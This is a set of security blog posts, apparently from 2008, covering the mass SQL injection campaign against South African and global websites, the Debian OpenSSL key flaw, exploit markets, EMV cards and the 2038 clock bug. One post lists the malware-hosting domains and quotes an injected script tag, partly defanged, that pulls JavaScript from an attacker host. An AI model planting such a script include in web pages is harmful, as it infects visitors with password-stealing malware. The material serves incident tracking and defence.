Microsoft has released a security advisory detailing three ways to respond to the SQL injection attacks. This advisory doesn't covery a patch, just three tools:

1. HP Scrawlr is a light weight version of HP's WebInspect that will look for SQL injection flaws. I love that they used the Bobby Tables XKCD comic.
2. A new version of UrlScan (3.0 beta) the IIS version of mod_security.
3. A source code analyser which will identify SQL injection vulns, although it currently only works for ASP and not ASP.NET.

That's pretty awesome, although, as always, these should be used to aid clue, not replace it.

Over the last few weeks, we have seen a set of incredibly uncomplicated and simple attacks effectively compromise several hundred South African web pages, and several million internationally. Many of the South African sites compromised were important; including major media organisations, several government institutions, large mining houses and even one information security company, who still have not removed the pie from their face. The intention of the attacks was to use the compromised web pages to infect visitors with a variety of malware, but most commonly, a trojan which attempts to steal as many passwords as it can, including specific references to some internet banking sites.

The response to the incident from both consumers and the affected companies seems to indicate that when it comes to the web in South Africa, nobody cares.

After my previous entry on EMV cards, Grant pointed me to this wonderful site, complete with wonderful PDF, neatly breaking down all the many reasons why EMV cards are broken. Well worth a read, especially if you are a Ross Anderson fan-boy.

I took the latest list from ShadowServer (as at 23 May 2008), and did a comparison of SA infected pages to globally infected pages. I used a lame google search for these, but it shows some interesting results. You can see where the focus on the 'well known' domains paid off, and the new injections haven't been cleaned up yet. There is a serious case of missing root cause analyses here. Still some large SA sites infected, but mainly Gov, Property and Storm telecoms sites now.

I now count approximately 1.5million infected sites based on the updated list of domains at ShadowServer. SA infected pages are now up to 1 340, although this varies wildly based on the Google DC queried. Some large SA sites are still being re-infected.

There's also a new consequence. Instead of just silently infecting your users with malware, which is hard to spot. Google is now blocking access to some of the sites, along with Firefox if you have the safe browsing lists enabled. If reputation doesn't drive action, falling ad revenues should.

Check out the comments on the last entry. Roberto spent some time responding, and re-responding. Makes for some interesting reading.

Last week, Roberto Preatoni, founder of WabiSabiLabi, the exploit eBay, gave a talk at the ITWeb Security Conference about his creation. I really wanted to ask a question, but there was no time. At the end of his talk, when asked who agrees that WabiSabiLabi is a good idea (i.e. creating a market place for vulnerabilities and exploits to be freely sold and traded, like eBay) like Roberto, I was surprised to see so many hands go up as the general info sec community has reacted quite harshly to the idea. A possible explanation based on my experience is that many ITWeb attendees are not 'hardcore' security people, and haven't been following the disclosure argument over the last decade. Then, given only Roberto's talk, chose to agree with him due to a lack of any exposure to rebuttal. When asked who disagrees, I was the only one who put their hand up.

So, here's why.

Debian released a patch to OpenSSL based on a Debian-specific bug resulting in random numbers being used for the secret parts of key generation not being so random (due to the random number generater not being seeded). Quoting from the mailing list announcement:

Affected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key material for use in X.509 certificates and session keys used in SSL/TLS connections [generated after 2006-09-17]. Keys generated with GnuPG or GNUTLS are not affected, though.

Ubuntu has also released a security announcement stating they too are affected (which likely means other Debian based distros are too, like the Xandros on your Asus EEE PC). In their words:

We consider this an extremely serious vulnerability, and urge all users to act immediately to secure their systems.

In our instance we needed to regenerate several SSH host keys. For ease of use, here are instructions for doing so. Please not these instructions are superceeded by the instructions which will be posted here (but aren't yet).

So, the SQL injections of last month are still going and on the increase. At last check (11am SAST) Google's index had 1 070 000 infected pages. Not all of these are from the same source, or load the same malware. However, they have the same basic principle:

generic SQL injection -> Javascript -> infect visitors

Several of the sites in South Africa I've been watching have been re-infected. I spoke to several of the admins, but it seems they are just restoring from backup and not fixing the root cause. The domains currently being injected and containing the malicious Javascript are:

• nihaorr1.com
• 2117966.net
• aspder.com
• haoliuliang.net
• nmidahena.com
• free.hostpinoy.info
• xprmn4u.info
• winzipices.cn
• wowgm1.cn
• killwow1.cn
• wowyeye.cn

Although, new ones are coming to my attention fairly quickly at the moment. For example, wowgm1.cn was re-injected over winzipices.cn on a few pages. The 'wow' range seem to be related, as they are re-infecting pages with a new URL. On the point of re-injections, it seems some are overwriting each other in funny ways, for example, the following was found on one page (*'s added):

<script src=http://www.2<script src=h**p://www.2117966.net/f*ckjp.js></script>

It bother's me that the security industry (particularly in SA) doesn't seem to have cottoned on to this as a widespread pervasive attack. Shadowserver (one, two) seems to be the only ones getting close to the problem, but even SANS is treating these as seperate events. There is only basic protection at the moment, if you click through from some of these sites (10%?) in Google, you will get a Malware warning. Continuing to the site anyway prevents me due to Firefox's security setting (which shares the same list from Google, i.e. stopbadware.org).

Given how successfull the exploitation of such an 'old' vulnerability, it is likely we are only going to see more (and better executed) versions of this in the next few months (years?). Hitting over a million pages with a pretty lame attack, that only targets Microsoft SQL is fairly impressive. If they just modified their SQL to work on MySQL or Postgres I'm sure we would seem more than a million more hit. It is interesting to note that it has taken this long from someone to try and 'monetise' SQL injections, as it has been around for a while (8 years?). My guess is that it will take less time for bad guys to do the same with XSS & CSRF, but that Microsoft's default request validation will save some of us, but not because dev's have cottoned on.

Based on Google's index, the following sites are/were infected based on the SQL injection attack discussed all over the place (1, 2, 3, 4, 5). From an SA perspective, News24, Sunday Times (available in dead tree only) and Talk Radio 702 have covered this.

Click here for Google's latest list.

Click here for Yahoo's latest list (much less accurate).

Status: Medium

• Most of the sites hosting the JavaScript are down, and most of the sites listed as infected seem to be clean (for SA). As this appears to be the 3rd or 4th injection, if web admins haven't fixed the root vulnerability and the attack is re-run pointing at a different domain, it could happen again.
• The command and control server the Trojan sends stolen passwords to is still up.

Warnings:

1. Do not click on any of the links from Google or Yahoo as you are likely to be taken to a website which will infect your computer with a trojan.
2. Search engines (aka Google and Yahoo) work on an index, which works on a snapshot of information. This snapshot takes a while to update, so some sites may be infected and not listed yet, and others may no longer be infected and still listed.

OSVDB's SoC code monkey, Dave, has been ferreting away and is already producing some good stuff (one, two, three). I am going to have a go at getting back into mangling some vulns later tonight. Given that the last time I mangled vulns was almost four years ago, I have a feeling I will be very pleased/surprised by the many changes.

For those of you living in the dark ages, OSVDB will be *the* canonical vulnerability reference one day, in the meantime it's just more accurate than the rest ;), all it needs is more manglers.

In December I received an EMV card from my bank in South Africa. I won't mention who they are as this isn't specific to them. In general it has annoyed me, as now I have to type in a PIN, which often necessitates me moving my lazy ass from the table to the waiters pay area and standing around while the steam punk mechanics work themselves out. And, I am *more* liable for fraud on my account.

I'm really enjoying the hype around the firewire hacks, originally presented by Maximillian Dornseif in 2004, breathed new life in 2006 by Adam Boileau and now re-hyping in 2008 thanks to Adam releasing the last bit of scripts to unlock a Windows machine (illegally!, gosh). I think Adam sums this up quite nicely:

Yes, it's a FEATURE, not a bug. It's the Fire in Firewire. Yes, I know this, Microsoft know this. The OHCI-1394 spec knows this. People with firewire ports generally don[']t.

Microsoft have released a bunch of protocol specifications for their proprietry protocols or implementations. Some of the whoppers I've added to my reading list are (in alphabetical order):

• "FrontPage Server Extensions: Website Management Specification" http://msdn2.microsoft.com/en-us/library/cc217914.aspx
• "Firewall and Advanced Security Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc231461.aspx
• "Local Security Authority (Domain Policy) Remote Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc234225.aspx
• "NT LAN Manager (NTLM) Authentication Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc236621.aspx
• "NTLM Over HTTP Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc237488.aspx
• "Remote Desktop Protocol: Basic Connectivity and Graphics Remoting Specification" http://msdn2.microsoft.com/en-us/library/cc240445.aspx
• "Remote Procedure Call Over HTTP Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc243950.aspx
• "Windows Security Health Agent (WSHA) and Windows Security Health Validator (WSHV) Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc251347.aspx
• "Windows Update Services: Client-Server Protocol Specification" http://msdn2.microsoft.com/en-us/library/cc251937.aspx

The items marked in red are for immediate reading. I am particularly excited about the WSUS proposal after my attempts at dissecting it in my masters thesis. This will be good for microsoft in the long run. Yay to the EU.

Heard of the year 2038 unix clock overflow bug? The 30th preversary is at 3am this Saturday. If any of your banks are using 32-bit Unix systems to do 30 year home loan calculation you may soon hear about this.

singe@platform:~$ uname -a
Linux platform 2.6.15-27-server #1 SMP Fri Dec 8 18:43:54 UTC 2006 i686 GNU/Linux
singe@platform:~$ sudo date -u 011903142038.06
Tue Jan 19 03:14:00 UTC 2038
singe@platform:~$ date
Tue Jan 19 05:14:07 SAST 2038
singe@platform:~$ date
Fri Dec 13 22:15:52 SAST 1901